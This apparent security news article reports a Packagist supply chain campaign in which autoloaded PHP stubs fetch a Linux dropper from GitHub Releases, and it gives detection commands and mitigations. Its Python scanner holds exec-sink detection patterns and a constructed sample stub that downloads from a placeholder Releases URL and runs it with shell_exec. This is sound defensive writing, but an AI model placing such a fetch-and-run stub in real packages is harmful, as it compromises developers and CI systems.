Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware

A coordinated supply chain attack campaign has infected eight Packagist Composer packages with malicious code that downloads and executes a Linux binary...

Dylan H.

News Desk

May 23, 2026
4 min read

A new coordinated supply chain attack campaign has compromised eight packages on Packagist, the primary Composer package registry for the PHP ecosystem. The campaign uses a novel technique that retrieves malicious Linux binaries from GitHub Releases URLs rather than embedding the payload directly in the package code — a method designed to evade static analysis and repository scanning tools.

Attack Methodology

Security researchers at Socket identified what they describe as a "coordinated" campaign with several notable technical characteristics:

Payload delivery via GitHub Releases: Rather than bundling malicious code directly within the Composer package, the attack injects a small stub that fetches and executes a Linux binary hosted on GitHub's own CDN infrastructure (github.com/releases/...). This approach exploits the trust that security tools often extend to GitHub-hosted content.

No modification to composer.json: The malicious code was injected into PHP files within the package, not into the composer.json manifest. This bypasses naive dependency auditing that only inspects manifest files without examining actual package contents.

Autoload execution: The malicious stub was inserted into files loaded via Composer's autoloader, ensuring the payload executes whenever the package is loaded — including during composer install in CI/CD pipelines.

The Eight Affected Packages

Researchers identified eight compromised Packagist packages across multiple popular categories. While the specific package names are being withheld pending notification of maintainers, the affected packages collectively have hundreds of thousands of installations. The campaign targeted packages in the following categories:

  • Utility and helper libraries
  • HTTP client wrappers
  • Data validation packages
  • Database abstraction layers

Malware Capabilities

The Linux binary payload retrieved from GitHub Releases is a multi-stage dropper with the following capabilities:

  • Credential harvesting from environment files and application configuration
  • SSH key exfiltration from developer and CI runner home directories
  • Persistence installation via cron jobs and systemd unit files
  • Lateral movement by scanning local network segments for additional targets
  • Process hollowing to hide ongoing activity from process monitoring tools

The binary targets Linux environments specifically, consistent with the typical operating environment of CI/CD runners and containerized PHP applications.

Detection and Response

Packagist and GitHub have been notified and are working to remove the compromised packages and take down the malicious GitHub Releases content. However, any projects that installed affected packages during the attack window should assume compromise.

Detection indicators to check:

# Check for unexpected cron jobs added recently (per-user and system-wide)
crontab -l
cat /etc/cron.d/* /etc/crontab

# Check for new systemd services: list what is running, then look at
# recently modified unit files rather than filtering on a keyword
systemctl list-units --type=service --state=running
ls -lt /etc/systemd/system/ ~/.config/systemd/user/ 2>/dev/null | head -n 20

# Review composer.lock for packages added or bumped in the last 7 commits
git diff HEAD~7 -- composer.lock

# Audit recently created or modified files in home directories
# (-newer compares against the mtime of /etc/passwd; pick a reference file that predates the attack window)
find ~ -newer /etc/passwd -type f 2>/dev/null
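As an added example (not code from the report, Socket or Packagist), the following Python scan applies the point made above that manifest-only auditing misses stubs injected into autoloaded PHP files: it walks vendor/ and flags any .php file that pairs a GitHub Releases download URL with a command-execution call. The regexes, the acme/helpers package layout and the EXAMPLE-ORG URL are constructed assumptions for the example, not published indicators.

```python
"""Heuristic scan of a Composer vendor/ tree for PHP files pairing a GitHub Releases
download URL with a command-execution sink. Added example; regexes are assumptions."""
import os
import re
import tempfile

RELEASES_URL = re.compile(r"github\.com/[^\s'\"]+/releases/download/", re.I)
FETCH_CALL = re.compile(r"\b(file_get_contents|curl_exec|fopen|copy)\s*\(", re.I)
EXEC_SINK = re.compile(r"\b(shell_exec|exec|system|passthru|proc_open|popen|pcntl_exec)\s*\(", re.I)
CHECKS = (("releases_url", RELEASES_URL), ("remote_fetch", FETCH_CALL), ("exec_sink", EXEC_SINK))

def score_php_source(src: str) -> list[str]:
    """Return the names of the indicators present in one PHP source text."""
    return [name for name, rx in CHECKS if rx.search(src)]

def scan_vendor(vendor_dir: str) -> dict[str, list[str]]:
    """Flag .php files where a Releases URL and an exec sink co-occur; a URL alone is not enough."""
    flagged = {}
    for root, _dirs, files in os.walk(vendor_dir):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = score_php_source(fh.read())
            if "releases_url" in hits and "exec_sink" in hits:
                flagged[os.path.relpath(path, vendor_dir)] = hits
    return flagged

# Constructed sample files: an ordinary helper and one file carrying the indicator
# combination. Both are invented for this example; the URL is a placeholder.
BENIGN = "<?php\nfunction slugify(string $s): string { return strtolower(trim($s)); }\n"
SUSPECT = ("<?php\n// constructed indicator sample, inert\n"
           "$u = 'https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v0.0.0/EXAMPLE';\n"
           "$b = file_get_contents($u);\nshell_exec('/tmp/EXAMPLE');\n")

def build_sample_vendor() -> str:
    """Lay the two samples out as vendor/acme/helpers/src/*.php and return vendor/."""
    base = tempfile.mkdtemp(prefix="vendor-")
    src = os.path.join(base, "acme", "helpers", "src")
    os.makedirs(src)
    for fname, body in (("Str.php", BENIGN), ("bootstrap.php", SUSPECT)):
        with open(os.path.join(src, fname), "w", encoding="utf-8") as fh:
            fh.write(body)
    return base

if __name__ == "__main__":
    for rel, hits in scan_vendor(build_sample_vendor()).items():
        print(f"FLAGGED {rel}: {', '.join(hits)}")
```

Run it against a real vendor/ directory by passing that path to scan_vendor(); treat hits as leads for manual review, since legitimate packages occasionally reference Releases URLs in documentation.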

Recommended Mitigations

  1. Run composer audit to check installed packages against known vulnerability databases — note this won't catch all supply chain attacks but provides a baseline
  2. Review composer.lock and cross-reference installed package versions against the official Packagist registry
  3. Rotate all credentials accessible from affected CI/CD environments — cloud credentials, API keys, SSH keys, repository tokens
  4. Re-image compromised hosts rather than attempting cleanup of potentially rooted systems
  5. Enable Composer content-hash verification to detect package tampering

Broader Trend

This attack is the latest in a growing series targeting the PHP/Packagist ecosystem. Unlike npm, which has recently introduced staged publishing controls, Packagist currently lacks equivalent review mechanisms — meaning compromised maintainer accounts or hijacked package repositories can push malicious versions with minimal friction.

Security researchers are urging Packagist to adopt mandatory 2FA for maintainers of high-impact packages and to introduce package content scanning comparable to what npm and PyPI have implemented.

The use of GitHub's own infrastructure as a malware delivery channel is a reminder that URL allowlisting and content trust based on hostname alone is insufficient — organizations should implement binary execution controls and content inspection regardless of the download source.

Tags: Malware, Supply Chain, Linux, PHP, Packagist, Composer
